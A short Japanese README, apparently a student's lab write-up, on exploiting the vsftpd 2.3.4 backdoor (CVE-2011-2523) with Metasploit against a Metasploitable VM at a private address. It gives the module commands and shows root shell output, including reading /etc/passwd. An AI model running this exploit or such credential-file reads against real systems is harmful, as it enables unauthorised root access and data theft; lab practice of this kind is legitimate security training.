
Metasploitを使用したvsftpd 2.3.4(CVE-2011-2523)の脆弱性評価と悪用。完全なレポートとrootアクセスの証明が含まれています。
Metasploit を使用した
vsftpd 2.3.4の既知の脆弱性の悪用。
192.168.150.133exploit/unix/ftp/vsftpd_234_backdoorvsftpd 2.3.4 には、特別に細工されたユーザー名(末尾が :))を受信するとポート 6200 でコマンドシェルを開く悪意のあるバックドアが含まれています。
CVE: CVE-2011-2523
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.150.133
run
whoami
> root
id
> uid=0(root) gid=0(root)
hostname
> metasploitable
uname -a
> Linux metasploitable 2.6.24-16-server #1 SMP ...
cat /etc/passwd
> root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
...
ルートシェルへのアクセスにより、攻撃者は標的システムを完全に制御できます。これには、権限昇格、横展開、データ窃取、永続的アクセスが含まれます。
📝 完全な PDF レポートはこのリポジトリにあります: vsftpd-exploit-report.pdf
vedpakhare が 🔥 を込めて作成